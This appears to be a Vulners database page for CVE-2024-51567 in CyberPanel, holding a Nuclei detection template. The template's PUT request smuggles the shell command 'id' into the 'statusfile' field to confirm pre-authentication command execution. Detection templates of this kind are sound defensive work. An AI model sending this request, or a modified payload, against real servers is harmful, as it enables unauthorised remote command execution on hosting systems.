| Reporter | Title | Published | Views | Family All 26 |
|---|---|---|---|---|
| CyberPanel upgrademysqlstatus Arbitrary Command Execution Exploit | 7 Nov 202400:00 | – | zdt | |
| CVE-2024-51567 | 29 Oct 202400:00 | – | attackerkb | |
| The vulnerability of the upgrademysqlstatus() function in the CyberPanel web hosting control panel allows a hacker to escalate their privileges and execute arbitrary commands. | 12 Dec 202400:00 | – | bdu_fstec | |
| Exploit for Missing Authentication for Critical Function in Cyberpanel | 31 Oct 202421:55 | – | githubexploit | |
| Exploit for Missing Authentication for Critical Function in Cyberpanel | 26 Nov 202402:18 | – | githubexploit | |
| CVE-2024-51567 | 30 Oct 202400:49 | – | circl | |
| CyberPanel Incorrect Default Permissions Vulnerability | 7 Nov 202400:00 | – | cisa_kev | |
| CISA Adds Four Known Exploited Vulnerabilities to Catalog | 7 Nov 202412:00 | – | cisa | |
| CyberPanel 安全漏洞 | 29 Oct 202400:00 | – | cnnvd | |
| CVE-2024-51567 | 29 Oct 202400:00 | – | cve |
id: CVE-2024-51567
info:
name: CyberPanel v2.3.6 Pre-Auth Remote Code Execution
author: DhiyaneshDK
severity: critical
description: |
upgrademysqlstatus in databases/views.py in CyberPanel (aka Cyber Panel) before 5b08cd6 allows remote attackers to bypass authentication and execute arbitrary commands via /dataBases/upgrademysqlstatus by bypassing secMiddleware (which is only for a POST request) and using shell metacharacters in the statusfile property, as exploited in the wild in October 2024 by PSAUX. Versions through 2.3.6 and (unpatched) 2.3.7 are affected.
remediation: |
Apply the latest security patches and updates from the vendor to address this vulnerability.
impact: Attackers can exploit this vulnerability by crafting malicious requests that bypass authentication controls, allowing them to inject and execute arbitrary commands on the underlying server.
reference:
- https://community.cyberpanel.net/t/cyberpanel-2-1-remote-code-execution-rce/31760
- https://dreyand.rs/code/review/2024/10/27/what-are-my-options-cyberpanel-v236-pre-auth-rce
- https://cwe.mitre.org/data/definitions/420.html
- https://cwe.mitre.org/data/definitions/78.html
- https://cyberpanel.net/KnowledgeBase/home/change-logs/
classification:
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H
cvss-score: 10
cve-id: CVE-2024-51567
cwe-id: CWE-306
epss-score: 0.86725
epss-percentile: 0.99719
cpe: cpe:2.3:a:cyberpanel:cyberpanel:*:*:*:*:*:*:*:*
metadata:
verified: true
max-request: 2
vendor: cyberpanel
product: cyberpanel
shodan-query: html:"CyberPanel"
tags: cve,cve2024,cyberpanel,rce,intrusive,kev,vkev,vuln
flow: http(1) && http(2)
http:
- raw:
- |
GET / HTTP/1.1
Host: {{Hostname}}
- |
PUT /dataBases/upgrademysqlstatus HTTP/1.1
Host: {{Hostname}}
X-CSRFToken: {{csrftoken}}
Content-Type: application/json
Referer: {{RootURL}}
Cookie: csrftoken={{csrftoken}}
{"statusfile":"/dev/null; id; #","csrftoken":"{{csrftoken}}"}
extractors:
- type: regex
part: header
name: csrftoken
internal: true
group: 1
regex:
- csrftoken=([A-Za-z0-9]+)
matchers-condition: and
matchers:
- type: word
part: body
words:
- "uid="
- "error_message"
- "requestStatus"
condition: and
- type: status
status:
- 200
# digest: 4a0a00473045022100e387f98263fc1e17652bee3144c7bc61ff116355f5e414ae852ba7fc0a5bfdaa02205ab6702bf44086490561b46fdafb4c35ac700257952363f6d4efc2db87e7abc1:922c64590222798bb761d5b6d8e72950Data
Build on a solid foundation with Vulners data
We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data
Api
Power your application with Vulners API
The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access
App
Assess and manage vulnerabilities with Vulners tools
Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation